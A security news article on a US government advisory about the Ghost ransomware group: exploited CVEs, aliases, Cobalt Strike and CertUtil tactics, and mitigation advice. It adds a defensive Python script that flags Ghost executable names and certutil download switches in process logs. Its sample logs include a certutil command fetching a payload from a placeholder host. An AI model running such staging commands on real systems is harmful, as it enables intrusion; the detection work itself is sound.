U.S. federal authorities have warned about Ghost ransomware attacks targeting various industries, including critical infrastructure, in over 70 countries.
“Beginning early 2021, Ghost actors began attacking victims whose internet-facing services ran outdated versions of software and firmware,” the advisory stated.
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) jointly issued the security advisory.
The financially motivated Ghost ransomware group seems to be working out of China, a major shift from most cybercrime gangs originating from Russia.
Also unlike most cyber attacks, which rely on phishing, Ghost ransomware attacks exploit known exploited vulnerabilities (KEV), some dating back as far as 2009, more than fifteen years ago.
Ghost ransomware attacks leverage known exploited vulnerabilities to target numerous industries.
Ghost ransomware attacks leverage publicly available code to exploit common vulnerabilities and exposures (CVEs) to breach organizations that have not applied recommended patches.
Commonly exploited vulnerabilities include CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. The group has also targeted vulnerable Fortinet VPNs through the Fortinet FortiOS path traversal vulnerability CVE-2018-13379, which Fortinet urged customers to patch numerous times between August 2019 and April 2021.
“Attacks on legacy cyber-physical, IoT, and IIoT devices – particularly in an OT environment – are to be expected and must be planned for as part of the operational requirements for the device,” noted Tim Mackey, Head of Software Supply Chain Risk Strategy at Black Duck. “Attackers know that best practices evolve and even the most secure device from a decade ago is likely quite vulnerable to a modern-day attack let alone those that may be mounted in the future.”
“Given that the usable life span of any cyber-physical device is measured in years, and potentially decades, organizations acquiring any such device should work closely with their suppliers to ensure a long-term operations and risk mitigation plan is created that covers not only [the] availability of patches, but [also] active sharing of threat scenario data,” added Mackey.
Tactics employed by the ransomware group
The Ghost ransomware team also uses various evasion tactics such as rotating its malware executables, changing the file extensions of encrypted files, using different email addresses to demand ransom, and changing the contents of its ransom notes.
The group likewise operates under different names, including Cring, Crypt3r, Ghost, Hello, HsHarada, Phantom, Rapture, Strike, and Wickrme, and its malware executables appear under different names such as Cring.exe, ElysiumO.exe, Ghost.exe, and Locker.exe. The ransomware group has also been observed using Mimikatz and Cobalt Strike beacons and deploying payloads with the legitimate Windows CertUtil utility.
“Ghost actors often rely on built-in Cobalt Strike functions to steal process tokens running under the SYSTEM user context to impersonate the SYSTEM user often for the purpose of running Beacon a second time with elevated privileges,” the FBI stated.
They use Cobalt Strike to harvest login credentials, including plaintext and hashed passwords, and to list running processes to identify which ones to target, for instance to learn which antivirus product is running so that it can be deactivated. Most malware, for example, checks whether Windows Defender is running in order to disable it.
“I see the use of Cobalt Strike by ransomware groups as fairly common. If you’re not looking for and detecting Cobalt Strike instances, you’re just asking for trouble,” warned Roger Grimes, data-driven defense evangelist at KnowBe4.
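The tactics described above, namely malware executables that appear under the names listed in the advisory and payloads staged with the built-in CertUtil utility, both leave traces in process-creation telemetry. The script below is an added illustration, not code from the advisory or the article, of how a defender can sweep such telemetry for those two indicators; the JSON event format, the host names, the URL, and the log lines themselves are constructed for the example.

```python
import json

# Malware executable names the advisory attributes to Ghost (from the article).
GHOST_EXECUTABLES = {"cring.exe", "elysiumo.exe", "ghost.exe", "locker.exe"}

# certutil.exe switches that fetch or decode content; legitimate in certificate
# administration, but a common way to stage a payload with a built-in tool.
CERTUTIL_STAGING_FLAGS = {"-urlcache", "-decode", "-decodehex"}


def classify_event(event: dict) -> list[str]:
    """Return the detection labels that apply to one process-creation event."""
    findings = []
    # Reduce the full image path to a lowercase basename, Windows or POSIX style.
    image = event.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    args = {tok.lower() for tok in event.get("CommandLine", "").split()}
    if image in GHOST_EXECUTABLES:
        findings.append(f"known Ghost executable name: {image}")
    if image == "certutil.exe" and args & CERTUTIL_STAGING_FLAGS:
        findings.append("certutil used with download/decode switches")
    return findings


def scan(log_lines: list[str]) -> list[dict]:
    """Parse one JSON event per line and collect every event that matched."""
    hits = []
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed telemetry rather than abort the sweep
        for finding in classify_event(event):
            hits.append({"host": event.get("Host", "?"),
                         "image": event.get("Image", ""),
                         "finding": finding})
    return hits


# Constructed sample telemetry: one benign certutil call, one download via
# certutil, one Ghost executable launch, and one corrupted line.
SAMPLE_LOGS = [
    r'{"Host":"ws01","Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil.exe -dump C:\\certs\\site.cer"}',
    r'{"Host":"ws01","Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil.exe -urlcache -split -f http://example.invalid/p.bin C:\\Users\\Public\\p.bin"}',
    r'{"Host":"srv02","Image":"C:\\Users\\Public\\Ghost.exe","CommandLine":"Ghost.exe"}',
    '{"Host":"srv02","Image":',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"{hit['host']}: {hit['finding']} ({hit['image']})")
```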
Besides critical infrastructure, Ghost ransomware attacks target healthcare, government, education, manufacturing, technology, and small and medium-sized businesses. The attacks are indiscriminate, however, with no preferred targets.
“This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China,” the agencies warned.
While the Ghost ransomware group threatens to sell stolen data, there is little evidence of that actually happening, suggesting possible nation-state involvement.
Recommendations to mitigate ransomware attacks
Meanwhile, CISA has listed the threat actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to assist network defenders in securing their organizations.
The FBI, CISA, and MS-ISAC’s recommendations include regularly maintaining up-to-date offsite backups so that the network can be reconstructed quickly in the event of a ransomware attack.
Other recommendations include patching security vulnerabilities in operating systems, firmware, and software as soon as they are discovered, prioritizing the most targeted flaws. Network administrators should also segment networks to limit lateral movement should threat actors gain access.
Lastly, system administrators should enforce phishing-resistant multi-factor authentication for privileged and email accounts to prevent takeovers if passwords are compromised.
“The Ghost ransomware campaign highlights the persistent reality that adversaries exploit known vulnerabilities faster than many organizations can patch them. This reinforces the critical need for proactive risk management – security leaders must ensure that software, firmware, and identity systems are continuously updated and hardened against exploitation,” concluded Darren Guccione, CEO and Co-Founder at Keeper Security.